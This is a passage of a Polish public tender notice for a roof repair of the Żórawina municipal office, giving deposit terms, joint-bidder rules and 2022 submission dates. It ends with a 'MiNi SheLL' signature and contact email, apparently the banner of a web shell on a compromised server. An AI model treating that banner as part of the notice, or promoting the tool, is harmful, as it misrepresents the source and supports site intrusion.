tysiące złotych 00/100)<br/>- przed upływem terminu składania ofert określonym w SWZ.<br/>2. Wadium może być wnoszone w jednej lub w kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2020 r. poz. 299).<br/>Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy w Banku Spółdzielczym w Kątach Wrocławskich<br/>oddział w Żórawinie 67 9574 1028 2002 0013 0013 0004 z dopiskiem – WADIUM /: Remont dachu budynku Urzędu Gminy<br/>w Żórawinie <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu niespełniania warunków, o których mowa w art. 108 PZP, natomiast spełnianie warunków udziału w<br/>postępowaniu Wykonawcy wykazują zgodnie z § 6 ust. 2 IDW.<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w § 8 ust. 2<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu, oraz brak podstaw wykluczenia.<br/>4) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku<br/>przynależności do tej samej grupy kapitałowej, o którym mowa w § 8 ust. 4 IDW składa każdy z Wykonawców.<br/>5) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie<br/>Zamawiającego złożyć podmiotowe środki dowodowe, o których mowa w § 8 ust. 7, przy czym dokumenty i oświadczenia, o<br/>których mowa w § 8 ust. 7 pkt 1) składa odpowiednio Wykonawca, który wykazuje spełnianie warunku, w zakresie i na<br/>zasadach opisanych IDW. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie ze wzorem umowy stanowiącej załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-25 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zorawina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com